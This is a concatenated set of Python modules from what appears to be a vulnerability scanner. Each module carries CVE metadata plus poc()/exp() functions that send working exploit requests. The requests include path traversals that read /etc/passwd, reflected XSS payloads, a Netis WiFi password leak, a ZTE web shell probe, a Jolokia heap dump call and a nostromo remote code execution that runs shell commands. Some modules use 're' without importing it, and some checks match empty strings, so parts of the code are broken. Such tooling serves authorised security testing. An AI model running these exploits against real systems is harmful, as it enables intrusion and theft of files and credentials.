url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/netis-info-leak.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak''', 9 | "description": '''A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/48384" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["netis", "exposure"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """//netcore_get.cgi""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Cookie': 'homeFirstShow=yes'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""rp_ap_password""" in resp0.text and """rp_ap_ssid""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' 
+ url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-4940.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin Tera Charts - Directory Traversal''', 9 | "description": '''Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-4940" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2014-4940", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "root:" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url 
-------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-0281.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Microweber Information Disclosure''', 9 | "description": '''Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0281" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 16 | "cvss-score": "7.5", 17 | "cve-id": "CVE-2022-0281", 18 | "cwe-id": "CWE-200" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "shodan-query":'''http.favicon.hash:780351152''' 23 | }, 24 | "tags": ["cve", "cve2022", "microweber", "disclosure"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/api/users/search_authors' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and '"username":' in resp.text and '"email":' in resp.text and '"display_name":' in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url 
-------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2962.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Belkin N150 Router 1.00.08/1.00.09 - Path Traversal''', 9 | "description": '''A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.kb.cert.org/vuls/id/774788", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-2962l" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-2962", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "lfi", "router", "firmware", "traversal"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- 
/modules/vulnerabilities/other/gsoap-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''gSOAP 2.8 - Directory Traversal''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/47653" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["gsoap", "lfi"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/../../../../../../../../../etc/passwd""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language': 'tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection': 'close'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (re.search(r"""root:[x*]:0:0""",resp0.text)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-10037.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''DomPHP 0.83 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/30865", 13 | "https://www.cvedetails.com/cve/CVE-2014-10037", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2014-10037" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-10037", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "root:" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-2166.py: -------------------------------------------------------------------------------- 1 
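import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2015-2166 (Ericsson Drutt MSDP directory traversal) check."""
    return {
        "author": "cckuailong",
        "name": '''Ericsson Drutt MSDP (Instance Monitor) Directory Traversal''',
        "description": '''Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.''',
        "severity": "high",
        "references": [
            "https://www.exploit-db.com/exploits/36619",
            "https://nvd.nist.gov/vuln/detail/CVE-2015-2166"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2015-2166",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2015", "lfi", "ericsson"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd via encoded "..%2f" traversal in the default URI (CVE-2015-2166).

    Returns {"success": True, "info": info(), "payload": <request URL>} on a 200
    containing "root:", otherwise {"success": False}; transport errors count as a
    non-match. `except Exception` replaces the bare `except:` that also swallowed
    KeyboardInterrupt, and the no-match path now carries a "success" key.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        # The slash stays percent-encoded on purpose: the traversal only works when
        # the server decodes it after its path check.
        path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2022/CVE-2022-0378.py ====
import requests


# Vuln Base Info
def info():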
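# -- CVE-2022-0378.py, continued from the previous line: body of info() --
    """Static metadata for the CVE-2022-0378 (Microweber reflected XSS) check."""
    return {
        "author": "cckuailong",
        "name": '''Microweber Reflected Cross-Site Scripting''',
        "description": '''Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.''',
        "severity": "medium",
        "references": [
            "https://nvd.nist.gov/vuln/detail/CVE-2022-0378"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "cvss-score": "5.4",
            "cve-id": "CVE-2022-0378",
            "cwe-id": "CWE-79"
        },
        "metadata": {
            "vuln-target": "",
            "shodan-query": '''http.favicon.hash:780351152'''
        },
        "tags": ["cve", "cve2022", "microweber", "xss"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Inject an onmousemove handler through the `id` parameter of the module manager (CVE-2022-0378).

    Returns {"success": True, "info": info(), "payload": <request URL>} when the
    page is a Microweber UI ("mwui_init") and the handler is reflected unescaped,
    otherwise {"success": False}; transport errors count as a non-match.
    `except Exception` replaces the bare `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        path = '/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        reflected = 'onmousemove="alert(document.domain)' in resp.text
        if resp.status_code == 200 and "mwui_init" in resp.text and reflected:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/vulnerabilities/other/mida-eframework-xss.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the Mida eFramework login-form XSS check."""
    return {
        "author":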
"cckuailong", 8 | "name": '''Mida eFramework - Cross Site Scripting''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | "" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["mida", "xss"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/MUP/""" 39 | method = "POST" 40 | data = """UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': '{{Hostname}}/MUP'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and (""">""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2019/CVE-2019-16278.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''nostromo 1.9.6 - Remote Code Execution''', 9 | "description": '''Directory Traversal in the function http_verify 
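# -- CVE-2019-16278.py, continued from the previous line: description tail, rest of info() --
            '''in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.''',
        "severity": "critical",
        "references": [
            "https://www.exploit-db.com/raw/47837"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": "",
            "cve-id": "CVE-2019-16278",
            "cwe-id": "CWE-22"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2019", "rce"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Execute `cat /etc/passwd` by traversing to /bin/sh in nhttpd (CVE-2019-16278).

    This is an active check: the POST body is run as a shell script on the target.
    Returns {"success": True, "info": info(), "payload": <request URL>} when a
    passwd entry comes back, otherwise {"success": False}; transport errors count
    as a non-match. `except Exception` replaces the bare `except:` that also
    swallowed KeyboardInterrupt.
    """
    # The module header imports only `requests`; re.search below raised NameError
    # on every run and the bare except turned that into a silent "not vulnerable".
    import re
    result = {"success": False}
    try:
        base = format_url(url)
        # ".%0d./" segments slip past http_verify's "../" check and resolve to /bin/sh.
        path = """/.%0d./.%0d./.%0d./.%0d./bin/sh"""
        method = "POST"
        data = """echo
echo
cat /etc/passwd 2>&1"""
        headers = {}
        resp0 = requests.request(method=method, url=base + path, data=data, headers=headers, timeout=10, verify=False, allow_redirects=False)
        if re.search(r"""root:.*:0:0:""", resp0.text):
            result.update({"success": True, "info": info(), "payload": base + path})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2014/CVE-2014-2321.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2014-2321 (ZTE cable modem web shell) check."""
    return {
        "author": "cckuailong",
        "name": '''ZTE Cable Modem Web Shell''',
        "description": '''web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd '''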
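# -- CVE-2014-2321.py, continued from the previous line: description tail, rest of info() --
            '''requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.''',
        "severity": "high",
        "references": [
            "https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/",
            "https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2014-2321",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["iot", "cve", "cve2014", "zte"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Check whether the unauthenticated ZTE web shell page is reachable (CVE-2014-2321).

    Passive check: it only fetches /web_shell_cmd.gch and looks for the shell
    prompt text plus the ZTE copyright; no command is sent. Returns
    {"success": True, "info": info(), "payload": <request URL>} on a match,
    otherwise {"success": False}; transport errors count as a non-match.
    `except Exception` replaces the bare `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        path = '/web_shell_cmd.gch'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        looks_like_shell = "please input shell command" in resp.text and "ZTE Corporation. All rights reserved" in resp.text
        if resp.status_code == 200 and looks_like_shell:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2014/CVE-2014-6308.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2014-6308 (OSClass oc-admin local file inclusion) check."""
    return {
        "author": "cckuailong",
        "name": '''Osclass Security Advisory 3.4.1 - Local File Inclusion''',
        "description": '''A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. '''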
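# -- CVE-2014-6308.py, continued from the previous line: description tail, rest of info() --
            '''(dot dot) in the file parameter in a render action to oc-admin/index.php.''',
        "severity": "high",
        "references": [
            "https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html",
            "https://nvd.nist.gov/vuln/detail/CVE-2014-6308"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2014-6308",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2014", "lfi"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd through the `file` parameter of the appearance renderer (CVE-2014-6308).

    The request path assumes OSClass lives under /osclass/; installs at another
    prefix are not detected. Returns {"success": True, "info": info(), "payload":
    <request URL>} on a 200 containing "root:", otherwise {"success": False};
    transport errors count as a non-match. `except Exception` replaces the bare
    `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        path = '/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2015/CVE-2015-6920.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2015-6920 (WordPress sourceAFRICA plugin XSS) check."""
    return {
        "author": "cckuailong",
        "name": '''sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)''',
        "description": '''WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.''',
        "severity": "medium",
        "references": [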
"https://packetstormsecurity.com/files/133371/", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-6920" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and '">' in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/jolokia/jolokia-heap-info-disclosure.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Jolokia Java Heap Information Disclosure''', 9 | "description": '''''', 10 | "severity": "info", 11 | "references": [ 12 | "" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | 
"tags": ["jolokia", "disclosure", "java"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/jolokia/""" 39 | method = "POST" 40 | data = """ 41 | { 42 | "type":"EXEC", 43 | "mbean":"com.sun.management:type=HotSpotDiagnostic", 44 | "operation":"dumpHeap", 45 | "arguments":[ 46 | "/tmp1234/test1.hprof", 47 | 0 48 | ] 49 | }""" 50 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 51 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 52 | 53 | if ("""stacktrace":"java.io.IOException: No such file or directory""" in resp0.text): 54 | result["success"] = True 55 | result["info"] = info() 56 | result["payload"] = url+path 57 | 58 | except: 59 | result["success"] = False 60 | 61 | return result 62 | 63 | 64 | # Exploit, can be same with poc() 65 | def exp(url): 66 | return poc(url) 67 | 68 | 69 | # Utils 70 | def format_url(url): 71 | url = url.strip() 72 | if not ( url.startswith('http://') or url.startswith('https://') ): 73 | url = 'http://' + url 74 | url = url.rstrip('/') 75 | 76 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-8349.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''SourceBans XSS''', 9 | "description": '''Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-8349" 13 | ], 14 | "classification": { 15 | "cvss-metrics": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 16 | "cvss-score": "6.1", 17 | "cve-id": "CVE-2015-8349", 18 | "cwe-id": "CWE-79" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2015", "xss", "sourcebans"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/" in str(resp.headers): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-3744.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Node.js st module Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-3744", 13 | "https://github.com/advisories/GHSA-69rr-wvh9-6c4q", 14 | "https://snyk.io/vuln/npm:st:20140206" 15 
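# -- CVE-2014-3744.py, continued from the previous line: end of references, rest of info() --
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "cvss-score": "7.5",
            "cve-id": "CVE-2014-3744",
            "cwe-id": "CWE-22"
        },
        "metadata": {
            "vuln-target": "",
        },
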